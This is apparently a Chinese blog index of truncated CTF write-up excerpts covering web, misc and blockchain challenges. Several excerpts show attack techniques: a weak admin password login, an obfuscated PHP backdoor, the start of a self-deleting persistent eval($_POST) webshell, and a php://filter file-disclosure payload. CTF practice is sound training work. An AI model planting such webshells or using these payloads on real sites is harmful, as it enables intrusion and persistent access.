喜提榜一 Webweb1flag在请求头中 web2扫描目录得到后台路径/admin 用admin，admin888弱口令进入后台 在网站安全一栏中使用检测木马功能，发现后门 使用文件管理功能查看木马文件，发现被混淆了 1234567891011<?php$mt = "mFsKCleRfU";$ojj = "IEBleldle";$hsa = &q

时间有点紧，有几题差一点 签到腾讯会议flag{we1c0m_t0_asur!ctf} miscbaby_mix伪加密，09改成00图片上边左边看到白条，应该是lsbstegsolve查看得到二维码扫码得到 14a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f57525

WEB670-WEB676这几题做法都一样发现/var/www/html目录可写，既然是权限维持，那么直接传不死马 12345678910<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = '<?php @eval($_POST["shell&

混了个三等奖，奖状至今未发（主办方跑路了。。。） MISCcheckinflag{welcome_to_zrb@2021} 阵法的奥秘提示是8进制，观察到最后的数字是变化的 123456789PING zrb.edisec.net: 56 data bytes64 bytes from zrb.edisec.net: icmp_seq=3 ttl=51 time=97.77 ms64 bytes

热身进群得码群里发送 击剑杯签到即可 听歌识曲赛后问了群友，可能真的是积累与特征吧大概有两种方法：1：听歌词百度2：直接知道什么歌答案是普京ctfshow{Vladimir_Vladimirovich_Putin} 看图识码网页是一张大的二维码，但是有四个定位符就很奇怪，根据hint，分离出四个小二维码用二维码神器cortexscan逐一扫描，然后拼接在一起，就是flag啦 看

前言个人感觉有几题出的不是很合理，但还是有收获的 In the Air Intro && Hint: 善于观察藏在身边的 flag， 提示：无线电会在空气中传播 没啥好说的，只有校内能做，WiFI名字就是flag easysend Intro && Hint: (区块链)描述：请发送0.1Rospten测试币到0x0b896c359adf4bb1c19c7dfd4

题目描述 你挂科咯 试试打入学校内网来修改成绩吧(我命由我不由天系列) 可以知道本题需要使用ssrf 伪协议在源代码中发现debug.php 在debug.php中发现可以使用伪协议 传入?file=php://filter/convert.base64-encode/resource=debug.php查看debug.php的源码 12345678910111213//debug.php关键源

题目代码12345678<?phphighlight_file(__FILE__);// 这些奇怪的符号是什么呢?字符串之间还能异或的吗?$a = $_POST['v'] ^ '!-__)^';// ctf常见的验证码哦!纯数字呢if (substr(md5($_POST['auth']),0,6) == "666666&

基础准备首先，需要一个钱包插件MetaMask,安装过程就不多说了，百度有很多教程选择一个在线ide 部署合约首先在默认目录下新建一个文件，注意以sol为后缀名 写上你的合约代码并选择编译器版本，编译成功后如图所示会出现编译成功的标志 最后部署合约，选择“Injected Web3”，表示我们要使用MetaMask注入的Web3环境，如果已正确连接MetaMask，可以看到“Ropsten (3)

MD5弱类型比较12345678910111213141516<?phphighlight_file(__FILE__);error_reporting(0);$a = $_GET['a'];$b = $_GET['b'];if (isset($_GET['a']) and isset($_GET['b']))&